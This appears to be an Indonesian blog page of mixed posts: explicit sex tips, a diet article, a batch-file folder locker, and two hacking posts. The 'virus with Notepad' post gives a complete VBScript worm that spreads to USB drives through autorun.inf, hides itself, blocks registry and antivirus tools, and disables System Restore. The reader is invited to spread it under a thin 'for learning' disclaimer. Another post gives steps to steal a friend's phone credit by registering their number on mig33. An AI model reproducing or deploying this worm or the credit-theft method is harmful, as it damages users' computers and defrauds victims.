Trik Cara Menikmati Payudara Wanita (Pasangan) Anda Dengan Nikmat

18.35 Posted In Edit This 1 Comment »

Apa yang paling mengasyikan bagi seorang pria dengan payudara pasangannya? Anda tentu sudah bisa menerka jawabannya. Memang semua laki-laki normal pasti suka bermain-main dengan buah dada atau payudara pasangannya.

Memulai pemanasan dengan memainkan payudara memberikan kenikmatan tersendiri baik bagi pihak pria maupun pasangannya. Mencium, menjilat, melumat dan menghisap payudara pasangan merupakan sensasi tersendiri yang tentunya hanya Anda dan pasangan saja yang bisa merasakannya.


Hanya saja memainkan payudara diperlukan keahlian tersendiri. Selain hal di atas, ada banyak hal yang bisa Anda lakukan pada payudara pasangan Anda. Alangkah sedih pasangan Anda jika anda tidak bisa atau tidak mengetahui trik yang benar dalam memainkan payudaranya.

Langkah pertama bisa anda mulai dengan meraba sambil sesekali meremas payudaranya. Lakukan dengan gerakan memutar. Anda juga bisa sesekali menciumi payudaranya sambil membisikan kata-kata pujian akan keindahan atau kekencangan payudara pasangan Anda. Ingat wanita sangat suka mendapatkan pujian dari pasangannya. Pujian Anda bisa membuatnya semakin bernafsu dan terangsang.

Hal selanjutnya yang bisa Anda lakukan adalah dengan menjilati puting susunya. Sentuh bagian Pentil ujung Payudaranya dengan lidah Anda. Lakukan dengan pelan dan lembut. Basahi bagian puting dan sekitarnya dengan air liur anda dan bayangkan anda tengah menikmati es krim yang sangat lezat dengan lidah dan bibir Anda.
Dalam kondisi basah Pentil puting susu akan terasa “hangat”. Lalu mainkan lidah Anda pada Pentil puting ke kiri, ke kanan, serong sana serong sini ( Ha ha ha ). Hal ini pasti akan membuat pasangan Anda mengeliat karena nikmat yang tidak tertahankan. Tips lain untuk merangsang bagian toket Payudara adalah melakukan kombinasi antara ciuman, jilat, remas dan sedotan.

Selanjutnya Anda bisa mengigit Pentilnya putingnya tapi jangan terlalu keras, kecuali jika putingnya termasuk tebal dan besar anda bisa sedikit keras mengigitnya ( Ha ha ha .... Hati - hati Putus Pentilnya Putingnya. Namun demikian Anda tetap harus berhati-hati karena Pentil puting payudara merupakan daerah yang sangat sensitif. jangn sampai gigitan Anda justru menyakitinya.
Pada saat mengigit mesra itulah pasangan Anda akan merasakan kenikmatan luar biasa. Ingat jangan terlalu lama dan keras mengigit karena nanti Pentilnya puting akan terasa perih. Kalu terasa perih anda bisa menjilati dan membasahinya lagi seperti sebelumnya. Dengan demikian puting susunya akan adem kembali.

Hal lain yang bisa anda lakukan adalah dengan “memakan” payudaranya. Yang di maksud memakan di sini bukan anda makan seperti anda memakan makanan ( Ha ha ha ... ) tetapi adalah dengan cara mengenyot gelembung payudara pasangan yang telah mengeras karena terangsang.

Lakukan perlahan-lahan, atau Anda bisa melakukan teknik dengan “mengunyah” payudara dengan memainkan tangan Anda dengan remasan lembut di sekitar daerah payudaranya.
Buat wanita, apa yang anda lakukan tersebut adalah seperti seorang bayi yang tengah menyusu pada ibunya. Lakukan semua itu dengan penuh kelembutan. Sensasi permainan lidah, bibir dan mulut serta tangan anda di payudaranya akan menimbulkan sensasi kenikmatan hebat yang akan semakin merangsang nafsu birahinya.

Jika Ada Yang Ingin Menambahkannya Silahkan Kirimkan Komentar Anda

Selengkapnya...

Tips Cara Berciuman Yang Romantis

18.33 Posted In Edit This 1 Comment »

berciuman? Hmm…, tahukah Anda, inilah “makan kecil” yang wajib dilakukan sebelum bercinta. Ciuman yang sukses akan menghasilkan persetubuhan yang indah, intim, berkeringat, dan, ehem, sangat menyenangkan! Karena itu, membuat ciuman menjadi sangat nyaman, mutlak harus diwujudkan. Kami tunjukkan kiatnya.

Seks dimulai dari bibir.
Begitulah seharusnya. Karena, di saat tak bergairah pun, sentuhan di wilayah ini akan menjadi pemicu berahi dan melecut syaraf untuk meminta tindakan yang lebih “jauh”.
Menurut Barbara Keesling, penulis Getting Close: A Cintar’s Guide to Embracing Fantasy and Heightening Sexual Connection, ciuman itu seperti strum listrik yang langsung memberikan kejutan pada seluruh saraf tubuh sehingga menimbulkan gejolak yang luar biasa. Salah satu stimulus yang paling tradisional adalah berciuman. Meskipun dilakukan tanpa antusiasme dari awal, rangsangan pada saraf bibir akan segera membangkitkan gairah. Apalagi bila Anda melakukan beberapa tips berciuman berikut ini;

1. Mendesahlah.


Saat Anda tak terlalu bergairah, ciuman yang diiringi dengan desahan akan membuat Anda dan si dia santai dan tak terburu-buru. Sambil mendekatkan wajah Anda padanya, sentuhlah bibirnya dengan lembut dan mendesahlah dengan pelan. Supaya lebih menggoda lakukan gerakan rotasi atau memutar.
Caranya : gerakkan kepala Anda ke kiri, ke kanan, ke atas dan bawah.

Rasakanlah, apakah bibir Anda dan pasangan sudah menghangat. Keluarkan jurus yang lebih seru, godalah bibir pasangan dengan menggelitik bibirnya menggunakan ujung lidah. Sentuhlah area bibir tengah si dia lalu berpindahlah pada titik-titik lain. Teruslah mendesah hingga udara yang keluar saat Anda mendesah bisa melembabkan bibirnya dan membawanya pada kenikmatan yang lebih sempurna.

2. Sentuh dan cubit.
William Cane, penulis buku The Art of Kissing, menyebutkan sentuhan jari dapat menimbulkan sensasi yang lebih hebat dari sekadar ciuman biasa. Itu artinya Anda perlu merangsang bibir pasangan dengan jari tangan. Caranya, sentuhlah bibir pasangan dengan jari-jemari Anda. Mainkan bibirnya lalu cubit sedikit bagian tengah bibirnya. Saat si dia terkejut, tarik tubuhnya, terus penuhi bibirnya dengan ciuman yang bertubi-tubi, isap!. Selanjutnya biarkan si dia mengambil alih kendali. Bukalah bibir Anda dan biarkan pasangan menunjukkan kemampuannya menstimulasi bibir Anda.

Saat Anda berdua mulai tergoda untuk melanjutkan pada kemesraan yang lebih dalam, hentikan ciuman dengan menutup bibir pasangan dengan jari-jemari Anda. Kemudian, bisikkan segala angan-angan yang ada dalam benak Anda. Jangan malu untuk mengungkapkan fantasi Anda pada pasangan.

3. Napas memburu.
Setelah menutup bibir pasangan dengan jari-jemari Anda, lakukan gerakan refleks dengan menutup seluruh bibir pasangan dengan bibir Anda. Usahakan tak ada celah yang memungkinkan udara keluar dari mulutnya. Kemudian, bukalah mulut Anda dan hirup napas dalam-dalam dari mulutnya. Lakukan secara bergantian. Sensasi yang akan Anda berdua rasakan adalah tarikan napas terengah. Kemungkinan, gaya ini sedikit mengagetkan pasangan. Bila pasangan tampak belum siap, cobalah untuk berlatih terlebih dulu. Kecuali, jika Anda ingin menjadikan gaya ini sebagai sebuah kejutan. Lihat reaksinya. Bila si dia tampak menyukainya, lakukan lagi. Sebaliknya bila pasangan tampak tak siap, jangan memaksa.

4. Pagutan kecil.
Bibir Anda mempunyai kekuatan yang luar biasa untuk menimbulkan gairah pasangan. Jadi gunakan senjata ini sebaik mungkin. Selain ciuman, Anda bisa menggigit di area sensitifnya. Lakukan gigitan-gigitan kecil, di bagian tubuhnya. Mulailah di bagian tubuh sensitif paling atas yaitu cuping telinga, kemudian perlahan menuju ke leher, dada, lengan, perut, dan pahanya. Lakukan gigitan dengan gigi depan.
Dengan gigitan kecil ini dijamin gairah akan meningkat. Pada saat itu hormon endorfin yang muncul akan mengunci saraf penerima rasa sakit sehingga gigitan Anda tak terasa menyakitkan. Sebaliknya menjadi sebuah kenikmatan yang luar biasa. Bahkan, pada saat itu menurut William Cane banyak suami atau istri yang baru menyadari bahwa gigitan pasangannya menimbulkan rasa sakit atau luka saat hubungan intim selesai.

5. Sensasi panas-dingin.
Panas dan dingin dua rasa yang berseberangan, tapi dalam sebuah gaya ciuman bisa dipadukan. Sensasi yang dihasilkan luar biasa. Ingin tahu caranya? Mula-mula siapkan minuman hangat, bisa teh, kopi, atau susu. Sediakan pula minuman dingin seperti es krim atau es batu.

Untuk ciuman awal minumlah minuman hangat agar bibir Anda terasa sedikit hangat. Segera setelah itu dengan bibir hangat Anda cium bibir pasangan. Sebelum pasangan bernapas, segera penuhi mulut Anda dengan minuman dingin atau es, lalu cium kembali bibir pasangan. Rasa dan suhu yang bervariasi ini dapat membangkitkan dua sensasi yang berbeda dalam sebuah ciuman sekaligus.

6. Menjeritlah!
Suara erangan Anda ternyata dapat membangkitkan semangat pasangan. Jeritan atau erangan yang ke luar dari mulut Anda menimbulkan getaran khusus. Bila getaran ini menyentuh kulit pasangan akan menimbulkan kenikmatan yang luar biasa. Tempelkan mulut Anda pada ujung rahangnya, lalu mulai geser mulut Anda perlahan mengikuti garis rahangnya hingga mencapai ujung rahang sisi lain. Mulailah mengerang atau menjerit yang akan menimbulkan getaran ke seluruh tubuh pasangan. Saat mengerang, tak ada salahnya Anda mengungkapkan kekaguman pada pasangan. Anda boleh mengerang keras diselingi jeritan kecil yang menggoda, atau tertawa-basah-desah.

Jika Ada Yang Ingin Menambahkan Silahkan Kirimkan Komentar Anda

Selengkapnya...

Cara Mengetahui Orgasme Pada Wanita

18.28 Posted In Edit This 1 Comment »

Setiap wanita memiliki reaksi yang berbeda saat mencapai orgasme, dan tidak ada indikator atau petunjuk pasti bagaimana mengetahui apakah kita sudah mencapai orgasme atau belum. Untuk memperdalam lebih jauh, berikut beberapa petunjuk untuk mengenali bahasa tubuh saat mencapai puncak:

1. Tubuh akan terasa lebih tegang saat orgasme terjadi.


Mungkin saat diajak bicara, kita hanya bisa diam. Nafas yang tak beraturan dan gerakan yang semakin liar, adalah pertanda awal menuju orgasme. Pada saat itu, vagina akan terasa mengembang dan mengerut. Meski tidak dapat dirasakan, biasanya pelumas dalam vagina akan meningkat.

2. Saat mulai orgasme, vagina akan mengalami kontraksi kecil.
Saat permulaan orgasme, Anda mungkin akan merasa seperti mengalami gempa dahsyat. Tanpa sadar Anda akan bersuara dan melenguh, serta membuat gerakan tak beraturan. Tapi ada juga yang saat orgasme hanya diam, tidak membuat gerakan sama sekali.

3. Banyak anggapan, kerasnya puting payudara adalah tanda orgasme wanita.
Tapi anggapan tersebut salah, sebab itu adalah pertanda seorang wanita bereaksi terhadap rangsangan atau reaksi tubuh terhadap atmosfir sekitar.

4. Beberapa wanita, saat ejakulasi akan mengeluarkan cairan dari saluran kemih yang terbuka sebagai reaksi terjadinya orgasme. Tapi bisa juga tak terjadi pada sebagian wanita. Cairan ejakulasi yang keluar dari saluran kemih ini, bukan urin. Bukan pula dari cairan vagina karena tidak licin. Keluarnya cairan ini, pertanda Anda telah mengalami orgasme.

5. Ada kemungkinan seorang wanita mencapai orgasme beberapa kali, selama perangsangan. Sedang beberapa wanita lainnya memerlukan jeda sebentar, antara orgasmeyang satu ke orgasme berikutnya, meski terus dirangsang. Sebagian wanita lainnya bahkan dapat beberapa kali orgasme nonstop – tanpa jeda.


Nah, cara terbaik apakah Anda sudah mencapai puncak atau belum, adalah bersikap terbuka, jujur dan melakukan komunikasi yang baik dengan pasangan^_^

Selengkapnya...

Membuat Script Virus Dengan Notepad > * Vbs

08.31 Posted In Edit This 0 Comments »

Ya..

Kali ini saya akan membagi script virus, script ini boleh anda sebarluaskan, bahkan anda jalankan. Tapi dengan tujuan untuk pembelajaran semata.

Kedewasan sikap anda sangat dibutuhkan, segala resiko yang dihasilkan oleh virus ini, diluar tanggung jawab saya.

Sekali lagi, gunakan script ini hanya untuk tujuan pembelajaran. Bukan untuk merusak, bila anda ingin melihat kemampuannya, silahkan aktifkan di komputer anda sendiri. Jangan di komputer orang lain. Saya tidak bertanggung jawab atas kerusakan yang di buat oleh virus ini.

Pertama-tama buka notepad, kemudian copas (copy-paste) script di bawah ini kedalam notepad, kemudian simpan dengan format vhck3d.vbs dimulai dari on error resume next

-------------------------script begin--------------------------

On error resume next

Dim dini,jatiya,i,loph,you,mf,isi,tf,vhck3d,nt,check,sd



'Siapkan isi autorun atau bahasa kerennya make the autorun

Isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe vhck3d.vbs"

Set you = createobject("scripting.filesystemobject")

Set mf = you.getfile(wscript.scriptfullname)

Dim text,size

Size = mf.size

Check = mf.drive.drivetype

Set text = mf.openastextstream(1,-2)

Do while not text.atendofstream

Dini = dini & text.readline

Dini = dini & vbcrlf

Loop

Do

'Buat file induk bahasa coolnya prepare the mother

Set i = you.getspecialfolder(0)

Set jatiya = you.getspecialfolder(1)

Set tf = you.getfile(jatiya & "\hck3d.vbs")

Tf.attributes = 32

Set tf = you.createtextfile(jatiya & "\hck3d.vbs",2,true)

Tf.write dini

Tf.close

Set tf = you.getfile(jatiya & "\hck3d.vbs")

Tf.attributes = 39


'Sebar ke removable disc ditambahkan dengan autorun.inf ini saya mah gak tau bahasa inggrisnya

For each loph in you.drives

If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then

Set tf=you.getfile(loph.path &"\vhck3d.sys.vbs")

Tf.attributes =32

Set tf=you.createtextfile(loph.path &"\vhck3d.vbs",2,true)

Tf.write dini

Tf.close

Set tf=you.getfile(loph.path &"\vhck3d.vbs")

Tf.attributes = 39

Set tf =you.getfile(loph.path &"\autorun.inf")

Tf.attributes = 32

Set tf=you.createtextfile(loph.path &"\autorun.inf",2,true)

Tf.write isi

Tf.close

Set tf = you.getfile(loph.path &"\autorun.inf")

Tf.attributes=39

End if

Next

'Manipulasi registry

Set vhck3d = createobject("wscript.shell")

'Sudah Terlihat Jelas , Virus Ini Bermain Regedit Kita

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\msconfig.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedt32.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\registryeditor.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\setup.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avscan.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avcenter.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ashavast.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ansav.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremoval.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremover.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\pcmav-cln.exe.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "my loph dini"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\limitsystemrestorecheckpointing", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\disablemsi", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disablesr", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disableconfig", "1", "reg_dword"

If check <> 1 then

Wscript.sleep 200000

End if

Loop while check <> 1

Set sd = createobject("wscript.shell")

Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname

-----------------------end script-----------------------------

Yaaa....itu adalah scriptnya, tapi kalau kalian mau modifikasi juga boleh..bahkan cukup sampai di

Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname

Juga boleh, yg bawahnya gak usah kalian lanjutin bisa..

Cara bunuhnya gampang.

Ikutin aja langkah2 dibawah ini untuk pembasmiannya.kalo virusnya aktif, (kalo belum, diaktifkan laaah) jangan buka my computer seperti biasa.tapi buka melalui explorer, bisa lewat start -> klik kanan di my computer, bisa lewat jendela + e(logo windows yang ada di keyboard). Lalu masuk di setiap drive melalui tree, ini agar virusnya tidak jalan di banyak drive, cuman cukup jalan di satu drive dimana kalian simpan dan mengaktifakn virus tersebut. Soalnya, kalo virusnya sudah aktif, lalu kalian klik 2x tiap2 drive kalian maka virus itu aktif di banyak drive soalnya di setiap drive ada file autorunnya.

Cara pembasmiannya :

1. Pake plugins ansav yang registry fx, ansav bisa kalian dapatkan disini http://ansav.com/. Setelah itu pilih check all, lalu restart explorer

2. Panggil task manager, bisa melalui ctrl+shift bersamaan lalu tekan esc di processes bunuh semua wscript.exe yang ada

3. Hapus semua file vhck3d.vbs serta autorun.inf di setiap drive

4. Hapus file induknya di c:\windows\system32 yang bernama hck3d.vbs

5. Panggil run, bisa melalui jendela + r (logo windows di keboard)masukkan parameternya PCMAV untuk mengembalikan settingan registry yang dirubah.



Selengkapnya...

NgeHack > Mencuri Pulsa Teman Anda ( Orang Lain ) Tanpa Sepengetahuannya

08.27 Posted In Edit This 0 Comments »

Yuhuuuu ..... , Setelah Selesai Memposting 2 Postingan Yang Berisi Tentang " Bugs > Cara Ngisi Pulsa GSM & CDMA Berlipat Ganda " Dan " Trick > Mengirim Pesan Tanpa Nomer Pribadi Hp Anda " ,,,

Pada Kali ini Saya Mempunyi Cara Nge Hack / Membajak / Mencuri Pulsa Teman Kita Tanpa Sepengetahuannya .....

Ihhhh .... Serammmm .... ^_^ hihihihihi.....

Yang Harus Di Ingat , Postingan ini Bukan Berarti Untuk Mengajarkan Kalian Yang Tidak Benar , Akan Tetapi Postingan ini Hanya Diperuntukan Untuk Pengetahuan Dan Tentunya Untuk Pembelajaran Semata ....

Ingin Tau ????Pnasarannn?????

Oke ....

Kalian Ikuti Cara Di Bawah ini :

1. kamu masuk aplikasi mig33 ( http://wap.mig33.com/join.php ) Tanpa Tanda Kurung , ( Gunakan Browse Mobile Anda ) Jangan Lewat PC Atau Warnet ( Notebook ) Anda,. Tanpa Tanda Kurung ,

2. Setelah Itu , Langsung Aja regristrasi ( Daftar ), kamu isi username, password, dan no hp (no. Korban yg akan kamu sedot pulsanya),

3. lalu submit, setelah itu kamu login dan pilih remind me later,

4. lalu kamu plih invite friend no tujuan kamu isi "TP(spasi)no.kamu(spasi)jumlah pulsa"( Tanpa Tanda Kutip ) , Yang Ingin Kamu Curi Dari Si Korban ,
( Yang Mesti Di Ingat , Misalkan Kamu Ingin Mencuri Pulsa Si Korban Sebanyak 50.000 , Akan Tetapi Pulsa Si Korban Hanya 20.000 , Maka Akan Terjadi Erorr ,Itu Di Karenakan Pulsa Si Korban Tidak Mencukupi Untuk Kamu Curi )

Contoh 1 :
Sebut Aja Kamu Dengan Nama Si " A " ( Si Pelaku Pencurian )
Dan Sebut Aja Si Korban Yang Ingin Kamu Curi Pulsa'a , Si " B "

SI "A" ---- > TP 08565555555 50000
Keterangan : Brati Si A Mencuri Pulsa Dari No Hp 08565555555 Sebanyak Rp.50.000

Si "B" ----- > Sementara Si " B " Pulsa'a Hanya Rp. 20.000

Apabila Kaya Seperti Di Atas , Kemungkinan Akan Terjadi Erorr ,Karena Pulsa Si " B " Hanya Rp.20.000 Sedangkan Si " A " Mencuri Rp.50.000 Dari Si "B" Yang Terjadi Adalah Pulsa Si B Tidak Mencukupi Target Yang Di Minta Oleh Si "A" , Maka Terjadilah Erorr .... Tapiiii ... Apabila DewiFortuna Di Pihak Anda Maka Cara Seperti ini pun Berhasil .... Maka Pulsa SI "B" Yang Rp.20.000 Tidak Tersisa Sepeserpun Untuk Si "B".

Nah ... Untuk Melakukan Yang Benar Dan Tidak Terjadi Erorr,,,, Gw Punya Tips ...

Ikuti Tips Di Bawah Ini :

1. Lo Mesti Tau Betul Orang Yang Ingin Lo Curi Pulsa'a ( Untuk Percobaan ) Lo Curi Pulsa Ade Lo Atau Kaka Lo Sndri

2. Lo Mesti Pulsa Dari Ade Atau Kaka Lo Yang Ingin Di Curi

3. Ini Di Karena Agar Lo Tau Betul Dan Yang Diperlukan Dalam Teknik Ini adalah Mengira-Ngira Isi Pulsa Si "B". Jangan Sampai Melebihi Dari Target Yang Lo Minta Ke Si "B"
Misalkan : Misal Si B Mempunyai Pulsa Rp. 30.000 , Maka Yang Harus Lo Lakuin Adalah , Jangan Melebihi Pada Saat Mencuri Pulsa Si B , Cara Seperti ini Kemungkinan 99,9% Sukses , Di Bandingkan Cara Sebelumnya ,

Contoh Yang Benar :

TP 085555555 29500 ( Maka Yang Akan Terjadi Adalah Pulsa Si "B" Hanya Kamu Sisain Rp.500 Perakkkk ..... )

Keterangan :
TP ----- > Perintah Tranfer Pulsa Untuk Operator M3 , Untuk kartu lain sesuaikan kode transfernya.

085555555 ----- > Nomer Hp Si Korban Yang Ingin Kamu Curi

29500 -------- > Jumlah Pulsa Yang Ingin Kamu Curi

Selamat NgeHack Pulsa Teman Anda .... ^_^
Jangan Di Gunakan Untuk Hal-Hal Yang Tidak Benar Ya .....


Selengkapnya...

Cara Mengunci Folder Windows Tanpa Instal Software

08.13 Posted In Edit This 0 Comments »

halo teman-teman. hanya sekedar berbagi tentang cara untuk mengunci atau melindungi folder yang benar-benar tidak boleh seorangpun yang sengaja atau tidak membukanya. hehe. terserah isinya apa aja. oya sebenarnya banyak sekali software yang bisa dipakai misalnya folder lock, instan lock dan masih banyak lagi.
nah berikut adalah trik untuk mengunci folder dengan cara mudah tanpa instal software
1. buka notepad lalu coppy paste tulisan dibawah ini :

@ECHO OFF
titipan kunci folder
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Serius nich mau Kunci ??(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Foldernya dah terkunci
goto End
:UNLOCK
echo Eiittt masukkan pasword dulu
set/p "pass=>"
if NOT %pass%== titipan goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Foldernya berhasil di buat
goto End
:End

2. save dengan tipe all file dan beri nama apa saja dan ahiri dengan .bat contoh: kunci.bat


3. simpan file tadi dimana kita suka lalu tekan enter.


4. silahkan periksa dan temukan di folder tempat kita menyimpan file .bat tadi pasti terdapat folder dengan nama locker.


5. simpan folder yang akan kita kunci ke dalam folder yang bernama locker tadi.


6. kembali ke file .bat tadi lalu tekan enter dan carilah file locker dengan tab, bila sudah pas pada locker tekan enter dan tekan y lalu enter lagi.


7. silahkan cek pasti folder locker itu menghilang. nah untuk membukanya atau menampilkan kembali enter pada file .bat tadi dan masukan pasword yaitu titipan.


catatan:


untuk mengubah pasword caranya yaitu sebelum kita save ke notepad tulisan di atas tadi silahkan edit kata-kata diatas yang namanya titipan menjadi apa saja. itu akan menjadi pasword kita nanti.hehehe. silahkan mencoba. salam.


Selengkapnya...

5 Kesalahan Saat Berdiet

17.30 Posted In Edit This 0 Comments »



Tidak semua gaya diet cocok untuk setiap orang. Contohnya, melewatkan makan malam. Ada orang yang sukses menerapkan cara ini, ada pula yang malah terkena maag. Mungkin Anda belum menyadari, bahwa ada pula cara berdiet yang terlihat efektif, namun malah akan menambah berat badan Anda. Tidak percaya? Coba cek lima hal di bawah ini.

Mengonsumsi berbagai jenis makanan
Tidak berhasil karena:
Kita selalu terdorong untuk makan lebih banyak jika dihadapkan pada pilihan yang berbeda-beda. Mekanisme ini memang akan berhasil jika yang kita konsumsi adalah makanan rendah kalori, seperti sayuran dan protein. Namun jika Anda mulai mengisi lemari es dengan aneka snack, atau bahan makanan lain yang tinggi kalori seperti bahan kentang goreng, sosis, nugget, atau es krim (belum lagi minuman kalengan), bayangkan bagaimana hasilnya.

Akan berhasil jika: Boleh-boleh saja jika ingin menyimpan bahan makanan di kulkas, namun batasi hanya satu atau dua jenis makanan saja. Sisa ruang dalam lemari es sebaiknya diisi dengan makanan yang benar-benar bergizi. Kumpulkan buku resep agar Anda dapat mengolah bahan makanan bergizi tersebut menjadi lebih berselera.



Langsung mengambil banyak makanan
Tidak berhasil karena:
Jika kita mengisi penuh piring makan dalam sekali saji, biasanya kita merasa harus menghabiskannya, kata Madelyn Fernstrom, Ph.D., direktur Weight Management Center di University of Pittsburgh Medical Center. Dan, akhirnya kita memang berusaha keras menghabiskan karena merasa sayang jika makanan dibuang. Jika Anda mengambil makanan sedikit-sedikit, Anda akan tahu kapan Anda merasa kenyang sebelum mulai mengisi lagi piring yang sudah kosong.

Akan berhasil jika: Mulai batasi diri Anda dengan mengurangi porsi makan Anda 20 persen dari biasanya. Setelah 20 menit kita akan mulai merasa kenyang. Jika masih ingin makan, tambahkan saja dua sendok nasi. Jaga agar porsinya tidak berlebih.

Menggunakan olahraga sebagai alasan untuk makan lebih banyak
Tidak berhasil karena:
Olahraga tidak membakar kalori sebanyak yang kita kira. Berlari selama 30 menit, contohnya, hanya akan membatalkan satu cup peanut butter, demikian menurut Ann Yelmokas McDermott, Ph.D., direktur Center for Obesity Prevention and Education, California Polytechnic State University, San Luis Obispo. Jika Anda berlatih untuk suatu acara olahraga, Anda justru butuh makan lebih banyak untuk menambah energi saat berlatih. Jika tidak, gunakan latihan rutin sebagai sarana untuk menjaga kondisi yang sudah ada, dan bukannya tiket masuk ke food court di mal.

Akan berhasil jika: Berolahraga, namun bukan untuk tujuan yang Anda bayangkan. Latihan kardio tidak akan membakar seluruhnya timbunan hasil pesta Anda pada akhir minggu. Hal itu akan memberi keuntungan kesehatan dengan meningkatkan energi dan menurunkan risiko penyakit jantung. Selain itu, ada manfaat tambahan, “Perilaku yang baik juga sering mendorong perilaku baik lainnya,” tukas McDermott. Misalnya, berlatih fisik akan membuat perasaan Anda nyaman, sehingga Anda pun makan dengan lebih baik.

Menggantung atasan favorit yang sudah sempit di kamar akan menjadi motivasi untuk diet
Tidak berhasil karena:
Anda boleh saja berpikir bahwa membeli terusan atau jeans dengan ukuran yang kekecilan, atau memasang foto Gisele Bundchen di dinding kamar akan mendorong Anda untuk menurunkan berat badan. Namun, hal ini biasanya tidak membawa hasil. “Sebagian perempuan merasa dirinya lebih buruk setelah melihat model bertubuh kurus dalam iklan. Dan jika Anda merasa diri Anda buruk, sulit untuk tetap menjalani rencana diet dan olahraga,” ujar Kathleen Martin Ginis, Ph.D., profesor di departemen psikologi kesehatan dan pelatihan di McMaster University in Hamilton, Ontario.

Akan berhasil jika: Fokus pada hasil, dan bukan jalan pintas. “Ketika Anda menyadari Anda tengah membandingkan tubuh Anda dengan perempuan lain yang sedang joging di dekat Anda, berhentilah. Pikirkan, saya bisa berlari lebih dari lima menit sebulan lalu,” tambah Martin Ginis. Jangan pula berpatokan pada tujuan akhirnya, seperti menurunkan berat Anda 10 kg. “Buat tujuan jangka pendek, seperti ’saya akan ke gym tiga kali minggu ini’, atau ’saya akan memasak makanan yang lebih sehat besok’,” tukasnya.

Sayuran dan buah-buahan bebas dimakan sebanyak apa pun

Tidak berhasil karena: Jika Anda menggemari buah-buahan kering yang berkalori dan berkadar gula tinggi, jus buah, atau sayuran yang mengandung zat tepung, Anda mesti berhati-hati. “Kacang-kacangan, jagung, dan kentang lebih tinggi kalorinya daripada sayuran lain yang mengandung air, seperti mentimun dan buncis,” ujar Keri Gans, R.D., juru bicara American Dietetic Association di New York City. Agar lebih efektif, Anda harus mengonsumsi 3-5 porsi sayuran setiap hari, dan hanya 2-4 porsi buah-buahan. “Sepotong buah segar mengandung 60 kalori, dan satu porsi sayuran umumnya 25 kalori,” tambah Gans.

Akan berhasil jika: Memilih sayuran yang mengandung banyak air seperti zucchini dan bayam, serta buah-buahan kaya serat seperti apel dan beri. Ganti juga saus yang mengandung lemak dan salad dressing dengan saus rendah kalori seperti saus salsa, ranch dressing bebas lemak, dan beri perasan lemon dan limau.

Sumber: Kompas.com

Selengkapnya...